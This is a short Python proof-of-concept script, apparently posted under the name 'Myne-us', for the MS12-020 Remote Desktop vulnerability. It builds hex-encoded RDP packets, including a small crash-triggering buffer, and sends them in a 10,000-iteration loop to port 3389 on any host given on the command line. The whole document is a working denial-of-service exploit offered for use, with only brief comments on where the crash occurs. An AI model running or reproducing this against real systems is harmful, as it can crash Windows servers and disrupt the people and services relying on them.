Myne-us smaller POC and info

1. # ms12-020 smaller
2. # I reduced the needed payload to DOS, the crashed is caused by buf2
3. # bp RDPWD!NM_Disconnect // crash is after this
4. #
5. # freenode #ms12-020
6.  
7. import socket
8. import sys
9. import time
10.  
11. #init
12. buf0 = "030000130ee000000000000100080000000000".decode('hex')
13. #MCS: Connection-initial
14. buf1 = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')
15. #payload
16. buf2 = "0300000802f08028".decode('hex')
17.  
18. package = buf0+buf1+buf2
19.  
20. HOST = sys.argv[1]
21. PORT = 3389
22. for i in range(10000):
23.     print i
24.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25.     s.settimeout(3)
26.     s.connect((HOST,PORT))
27.     try:
28.         s.send(package)
29.         rec = s.recv(1024)
30.     except:
31.         pass
32.     s.close()